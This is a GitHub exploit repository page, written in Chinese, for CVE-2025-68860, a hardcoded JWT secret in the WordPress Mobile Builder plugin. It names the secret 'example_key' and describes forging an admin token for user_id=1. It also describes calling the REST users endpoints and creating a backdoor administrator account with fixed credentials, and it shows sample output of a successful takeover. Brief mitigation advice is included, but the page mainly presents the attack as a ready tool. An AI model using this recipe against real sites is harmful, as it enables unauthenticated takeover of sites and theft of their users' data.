DedsecTeam-BlackHat/CVE-2025-68860
GitHub: DedsecTeam-BlackHat/CVE-2025-68860
针对 WordPress Mobile Builder 插件 JWT 硬编码密钥漏洞的自动化利用脚本,可伪造管理员令牌并创建后门账户实现站点接管。
Stars: 0 | Forks: 0
# WordPress Mobile Builder <= 1.4.2 - 身份验证失效 (CVE-2025-68860)
## 描述
WordPress Mobile builder 插件 1.4.2 及以下版本存在 Broken Authentication 漏洞,允许攻击者使用默认密钥 "example_key" 生成有效的 JWT token,并以管理员身份 (user_id=1) 进行认证。利用该 token,攻击者可以创建新的管理员账户并接管网站。
## 漏洞详情
CVE: CVE-2025-68860
原因: 对 JWT 使用了硬编码的 secret key "example_key",且缺乏充分的验证。
漏洞位置: 在 Mobile builder 插件中,处理 JWT 认证的文件(例如 class-jwt-auth.php)使用了值为 'example_key' 的常量 JWT_SECRET。此 Secret 无法通过设置更改,因此攻击者可以为任何 user_id 生成 token。
影响: 攻击者可以为 user_id=1(管理员)生成 token,访问 REST API endpoint,并创建具有管理员角色的新用户。
CVSS: High (分数 8.8) - 网络向量,无需用户交互。
## 漏洞利用原理
1. 脚本使用包含 ```user_id: 1 (admin) 和 secret "example_key"``` 的 payload 生成一个 JWT token。
2. 该 token 用于访问 ```/wp-json/wp/v2/users/``` 以验证管理员权限。
3. 如果成功,脚本向 ```/wp-json/wp/v2/users``` 发送 POST 请求,创建一个用户名为 dedsec1337、密码为 admin、邮箱为 dedsec1337@gmail.com 且角色为管理员的新用户。
4. 输出显示凭证和 API 响应。
## 环境要求
```
Python 3.6+
Library: requests, PyJWT, colorama
Target WordPress dengan plugin Mobile builder versi <= 1.4.2 yang aktif.
```
## 安装说明
```
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt
```
## 输出示例
```
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit ║
║ CVE-2025-68860 Priority: HIGH ║
║ Dedsec Team Exploit ║
╚═══════════════════════════════════════════════════════════════════╝
Exploit by : Dedsec Team Exploit
Telegram : @DedsecTeam1337
GitHub : https://github.com/DedsecTeam-BlackHat
[INFO] CVE-2025-68860 // WordPress Mobile builder Broken Authentication
[INFO] All old exploits/settings are ignored, running this vector only.
Site URL (example: http://target.site): http://localhost/wordpress
[INFO] Generating JWT as admin (user_id=1)...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] Testing JWT at /wp-json/wp/v2/users/me
[SUCCESS] JWT valid! Confirmed admin access.
--------------------------------------------------------------
[INFO] Creating admin account using exploit...
[INFO] Exploiting, please wait...
[SUCCESS] ✅ Admin user created successfully!
==============[ New Admin Credentials ]==============
Username : dedsec1337
Password : admin
Email : dedsec1337@gmail.com
===================================================
Full API response:
{
"id": 3,
"username": "dedsec1337",
"name": "dedsec1337",
"email": "dedsec1337@gmail.com",
"roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] Exploit finished. Enjoy your shell.
...
```
## 危害
1. 攻击者可以创建新的管理员账户,访问 WordPress 的所有功能,安装恶意插件,篡改内容,窃取用户数据,或利用该网站发起进一步攻击。
2. 此漏洞可被远程利用,无需事先认证。
3. 影响:导致 WordPress 网站完全沦陷。
## 缓解措施
1. 立即将 Mobile builder 插件更新至最新版本 (>=1.4.3)。
2. 如果没有可用的更新,请暂时停用该插件。
3. 检查您的网站上是否存在可疑用户。
4. 使用 Web 应用防火墙 (WAF) 来阻止针对 REST API endpoint 的可疑请求。
5. 作为临时措施,修改插件代码中的 secret key(如果可能)并限制对 REST API 的访问。
标签:Broken Authentication, CVE-2025-68860, JWT攻击, REST API滥用, Web安全, WordPress插件漏洞, 协议分析, 权限提升, 硬编码密钥, 移动端构建器, 管理员接管, 蓝队分析, 身份验证绕过, 逆向工具